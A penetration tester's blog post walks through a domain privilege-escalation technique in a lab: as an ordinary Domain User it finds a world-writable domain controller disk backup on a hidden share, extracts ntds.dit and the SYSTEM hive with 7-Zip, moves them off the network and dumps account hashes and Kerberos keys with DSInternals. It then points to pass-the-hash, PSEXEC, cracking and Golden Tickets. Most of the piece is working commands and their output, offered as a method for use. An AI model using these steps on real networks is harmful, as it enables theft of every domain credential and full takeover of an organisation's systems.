Where a 10-year old backup can fcuk you in the ass…

My favourite ways to get DA (or other elevated privilege), is by taking advantage of random stuff just lying around the environment. I came across a brilliant example of this last week, which involved a VHD backup from a Domain Controller (you can see where this is going).

This wasn’t a full outside->in attack; I had access to a legit desktop as a Domain User.

Listing Domain Shares

We can start off by dumping all of the domain shares that the current user has read access to.

PS C:\Users\testuser> Find-DomainShare -CheckShareAccess | fl | Out-File domain-shares.txt
PS C:\Users\testuser> gc .\domain-shares.txt


Name         : Backup$
Type         : 0
Remark       :
ComputerName : dc01.testlab.local

Name         : NETLOGON
Type         : 0
Remark       : Logon server share
ComputerName : dc01.testlab.local

Name         : SYSVOL
Type         : 0
Remark       : Logon server share
ComputerName : dc01.testlab.local

We see an interesting hidden share called Backup$ on dc01.

Find Interesting Files

Next, list the file content and verify the file permissions.

PS C:\Users\testuser> ls \\dc01\backup$


    Directory: \\dc01\backup$


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       03/02/2018     14:58    10966007808 dc01.testlab.local.vdi
PS C:\Users\testuser> icacls \\dc01\backup$\dc01.testlab.local.vdi
\\dc01\backup$\dc01.testlab.local.vdi LAB\Domain Users:(I)(RX,W)
                                      NT AUTHORITY\SYSTEM:(I)(F)
                                      BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files

These permissions are inherited from the share directory on dc01, and grants all Domain Users read, write and execute rights on dc01.testlab.local.vdi.

Extract the Secrets

At this point, I think most articles will suggest downloading & mounting the virtual image so you can extract the information you want. There are two issues with this approach:

  • You need local admin on Windows to mount a VHD (which you might not have in the target env).
  • VHDs are usually pretty big and a lot of data to move internally, even more so to exfil to a machine you control outside the target env. Right Steve ;)

It would be much better imo if we could just extract the two files we need directly.

7-Zip

The 7-Zip File Manager is a great option if the circumstances allow. I was able to drop 7zFM.exe and 7z.dll to the domain workstation, then extract the exact two files I wanted.

\\dc01\backup$\dc01.testlab.local.vdi\1.ntfs\Windows\NTDS\ntds.dit \\dc01\backup$\dc01.testlab.local.vdi\1.ntfs\Windows\System32\config\SYSTEM

Better yet, you can extract these directly to your machine (rather than extracting them into the share directory and copying them across separately).

PS C:\Users\testuser> ls


    Directory: C:\Users\testuser


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       18/01/2018     20:35                Contacts
d-r---       17/02/2018     12:34                Desktop
d-r---       18/01/2018     20:35                Documents
d-r---       18/01/2018     20:35                Downloads
d-r---       18/01/2018     20:35                Favorites
d-r---       18/01/2018     20:35                Links
d-r---       18/01/2018     20:35                Music
d-r---       18/01/2018     20:35                OneDrive
d-r---       18/01/2018     20:35                Pictures
d-r---       18/01/2018     20:35                Saved Games
d-r---       18/01/2018     20:35                Searches
d-r---       18/01/2018     20:35                Videos
------       04/10/2016     17:06        1609216 7z.dll
-a----       04/10/2016     15:54         839168 7zFM.exe
-a----       17/02/2018     11:47           1140 domain-shares.txt
-a----       26/01/2018     22:01       20971520 ntds.dit
-a----       26/01/2018     22:01       12582912 SYSTEM

Dumping Creds

I exfiltrated ntds.dit and SYSTEM to my external machine and decided to try the DS Internals PowerShell modules.

Here’s an example of its use:

PS C:\Users\Rasta\Desktop> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\Users\Rasta\Desktop> Get-ADDBAccount -SamAccountName 'TestUser' -DBPath .\ntds.dit -BootKey $key

DistinguishedName: CN=Test User,CN=Users,DC=testlab,DC=local
Sid: S-1-5-21-685307900-2367635464-2133520042-1104
Guid: a7e9722e-c8e6-44d8-9718-5686adc84d5a
SamAccountName: testuser
SamAccountType: User
UserPrincipalName: [email protected]
PrimaryGroupId: 513
SidHistory:
Enabled: True
UserAccountControl: NormalAccount, PasswordNeverExpires
AdminCount: False
Deleted: False
LastLogon: 17/02/2018 12:26:07
DisplayName: Test User
GivenName: Test
Surname: User
Description:
ServicePrincipalName:
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited, SelfRelative
Owner: S-1-5-21-685307900-2367635464-2133520042-512
Secrets
  NTHash: fc525c9683e8fe067095ba2ddc971889
  LMHash:
  NTHashHistory:
    Hash 01: fc525c9683e8fe067095ba2ddc971889
  LMHashHistory:
    Hash 01: fa305938fd3a4e76a2c7b1bf11a6a18a
  SupplementalCredentials:
    ClearText:
    NTLMStrongHash: dc42f9b4c525a0a145ab8303cdf8ebcf
    Kerberos:
      Credentials:
        DES_CBC_MD5
          Key: a4b67915c8526476
      OldCredentials:
      Salt: TESTLAB.LOCALtestuser
      Flags: 0
    KerberosNew:
      Credentials:
        AES256_CTS_HMAC_SHA1_96
          Key: 950e12c1f1b3cf2536834550cb947ed09fc7b6e8a27371cfcadff4dc35b2e200
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: 5ee798833e2dc4aca49ed9a2d816aa60
          Iterations: 4096
        DES_CBC_MD5
          Key: a4b67915c8526476
          Iterations: 4096
      OldCredentials:
      OlderCredentials:
      ServiceCredentials:
      Salt: TESTLAB.LOCALtestuser
      DefaultIterationCount: 4096
      Flags: 0
    WDigest:
      Hash 01: b5062942b81ab51387e6ee5444c75c98
      Hash 02: 3a3db08999164924e88823d249c8af45
      Hash 03: 0a0dc041414c282bf989424c5f948d09
      Hash 04: b5062942b81ab51387e6ee5444c75c98
      Hash 05: 3a3db08999164924e88823d249c8af45
      Hash 06: ecc6a9c1815bea8adc69877a6c9be8bb
      Hash 07: b5062942b81ab51387e6ee5444c75c98
      Hash 08: ba3981f46d68b04626c18c49664502a3
      Hash 09: ba3981f46d68b04626c18c49664502a3
      Hash 10: 9093651592378198707ea0b7b10d63c5
      Hash 11: 906bcd8e0e795d4e449114652dd8fb94
      Hash 12: ba3981f46d68b04626c18c49664502a3
      Hash 13: 044ed781762f98964f5f9fdd6a7a2724
      Hash 14: 906bcd8e0e795d4e449114652dd8fb94
      Hash 15: ca5018f3376aeb6c2a313df74dab36d5
      Hash 16: ca5018f3376aeb6c2a313df74dab36d5
      Hash 17: 4b96c357eb3bb9c7df7dcf95e67b9f4b
      Hash 18: 09e178a0ccffd3fca5b4febb8a3880a9
      Hash 19: 3d00b89bfab11a3257c5297d4d2315d0
      Hash 20: 0eac68e6c7a9a3781fef5e4ad0593016
      Hash 21: 79a1f49737bf634b2c6ff6cf33679f0d
      Hash 22: 79a1f49737bf634b2c6ff6cf33679f0d
      Hash 23: 024c49ae479c588b20353ccc777e486a
      Hash 24: fb8170f67f7f5fd79f9d9664819bf4bb
      Hash 25: fb8170f67f7f5fd79f9d9664819bf4bb
      Hash 26: ed583eb40396fbfbdb147696fbf2b537
      Hash 27: 3bd70fb036ef316b21c06ccb229be2cd
      Hash 28: e03a002b7d9197d33923078317b3e72f
      Hash 29: 77ac5a611d39db8a0a142e245e43ef16
Credential Roaming
  Created:
  Modified:
  Credentials:

The UserAccountControl field is great to target accounts that have PasswordNeverExpires set, then use those NTLM hashes with PTH or PSEXEC. You could also attempt to crack the hashes to recover plaintext passwords.

There’s also lots of fun to be had with the krbtgt hash, such as Golden Tickets.

Improvements?

The 7-Zip File Manager can only be used with a GUI, so what if we only had a shell?

There is also a command line version of 7z.

C:\Users\Rasta\Desktop\7-Zip>7z.exe

7-Zip [64] 16.04 : Copyright (c) 1999-2016 Igor Pavlov : 2016-10-04

Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...]
       [<@listfiles...>]

<Commands>
  a : Add files to archive
  b : Benchmark
  d : Delete files from archive
  e : Extract files from archive (without using directory names)
  h : Calculate hash values for files
  i : Show information about supported formats
  l : List contents of archive
  rn : Rename files in archive
  t : Test integrity of archive
  u : Update files to archive
  x : eXtract files with full paths

However, you don’t appear to be able to list or extract files in the archive recursively (even though there’s an option for it).

C:\Users\Rasta\Desktop\7-Zip>7z.exe l "E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi"

7-Zip [64] 16.04 : Copyright (c) 1999-2016 Igor Pavlov : 2016-10-04

Scanning the drive for archives:
1 file, 32047628288 bytes (30 GiB)

Listing archive: E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi

--
Path = E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi
Type = VDI
Physical Size = 32047628288
Headers Size = 2097152
Method = Dynamic
----
Size = 107374182400
Packed Size = 32045531136
--
Path = dc01.testlab.local.mbr
Type = MBR
Physical Size = 107374182400

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
                    .....    524288000    524288000  0.ntfs
                    ..... 106847797248 106847797248  1.ntfs
                    .....      1048576      1048576  2
------------------- ----- ------------ ------------  ------------------------
                          107373133824 107373133824  3 files
C:\Users\Rasta\Desktop\7-Zip>7z.exe e "E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi" -oC:\Users\Rasta\Desktop ntds.dit -r

7-Zip [64] 16.04 : Copyright (c) 1999-2016 Igor Pavlov : 2016-10-04

Scanning the drive for archives:
1 file, 32047628288 bytes (30 GiB)

Extracting archive: E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi
--
Path = E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi
Type = VDI
Physical Size = 32047628288
Headers Size = 2097152
Method = Dynamic
----
Size = 107374182400
Packed Size = 32045531136
--
Path = dc01.testlab.local.mbr
Type = MBR
Physical Size = 107374182400


No files to process
Everything is Ok

Files: 0
Size:       0
Compressed: 32047628288

If anybody knows how to actually do this, I’d love to hear from you!

The lame way, is to extract 1.ntfs first.

C:\Users\Rasta\Desktop\7-Zip>7z.exe e "E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi" -oC:\Users\Rasta\Desktop 1.ntfs

7-Zip [64] 16.04 : Copyright (c) 1999-2016 Igor Pavlov : 2016-10-04

Scanning the drive for archives:
1 file, 32047628288 bytes (30 GiB)

Extracting archive: E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi
--
Path = E:\VirtualBox VMs\testlab.local\dc01.testlab.local\dc01.testlab.local.vdi
Type = VDI
Physical Size = 32047628288
Headers Size = 2097152
Method = Dynamic
----
Size = 107374182400
Packed Size = 32045531136
--
Path = dc01.testlab.local.mbr
Type = MBR
Physical Size = 107374182400

Everything is Ok

Size:       106847797248
Compressed: 32047628288
C:\Users\Rasta\Desktop\7-Zip>7z.exe l ..\1.ntfs | more

7-Zip [64] 16.04 : Copyright (c) 1999-2016 Igor Pavlov : 2016-10-04

Scanning the drive for archives:
1 file, 106847797248 bytes (100 GiB)

Listing archive: ..\1.ntfs

--
Path = ..\1.ntfs
Type = NTFS
Physical Size = 106847797248
File System = NTFS 3.1
Cluster Size = 4096
Sector Size = 512
Record Size = 1024
Created = 2018-01-15 04:09:04
ID = 5766460664093954998

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2018-01-15 04:09:04 ..HS.    110362624    110362624  [SYSTEM]\$MFT
2018-01-15 04:09:04 ..HS.         4096         4096  [SYSTEM]\$MFTMirr
2018-01-15 04:09:04 ..HS.     67108864     67108864  [SYSTEM]\$LogFile
2018-01-15 04:09:04 ..HS.            0            0  [SYSTEM]\$Volume
2018-01-15 04:09:04 ..HS.         2560         4096  [SYSTEM]\$AttrDef
2018-02-15 20:13:10 D.HS.                            [SYSTEM]\.
2018-01-15 04:09:04 ..HS.      3260736      3264512  [SYSTEM]\$Bitmap
2018-01-15 04:09:04 ..HS.         8192         8192  [SYSTEM]\$Boot
-- More  --
C:\Users\Rasta\Desktop\7-Zip>7z.exe e ..\1.ntfs -oC:\Users\Rasta\Desktop Windows\NTDS\ntds.dit

7-Zip [64] 16.04 : Copyright (c) 1999-2016 Igor Pavlov : 2016-10-04

Scanning the drive for archives:
1 file, 106847797248 bytes (100 GiB)

Extracting archive: ..\1.ntfs
--
Path = ..\1.ntfs
Type = NTFS
Physical Size = 106847797248
File System = NTFS 3.1
Cluster Size = 4096
Sector Size = 512
Record Size = 1024
Created = 2018-01-15 04:09:04
ID = 5766460664093954998

Everything is Ok

Size:       20971520
Compressed: 106847797248
C:\Users\Rasta\Desktop\7-Zip>7z.exe e ..\1.ntfs -oC:\Users\Rasta\Desktop Windows\System32\config\SYSTEM

7-Zip [64] 16.04 : Copyright (c) 1999-2016 Igor Pavlov : 2016-10-04

Scanning the drive for archives:
1 file, 106847797248 bytes (100 GiB)

Extracting archive: ..\1.ntfs
--
Path = ..\1.ntfs
Type = NTFS
Physical Size = 106847797248
File System = NTFS 3.1
Cluster Size = 4096
Sector Size = 512
Record Size = 1024
Created = 2018-01-15 04:09:04
ID = 5766460664093954998

Everything is Ok

Size:       12582912
Compressed: 106847797248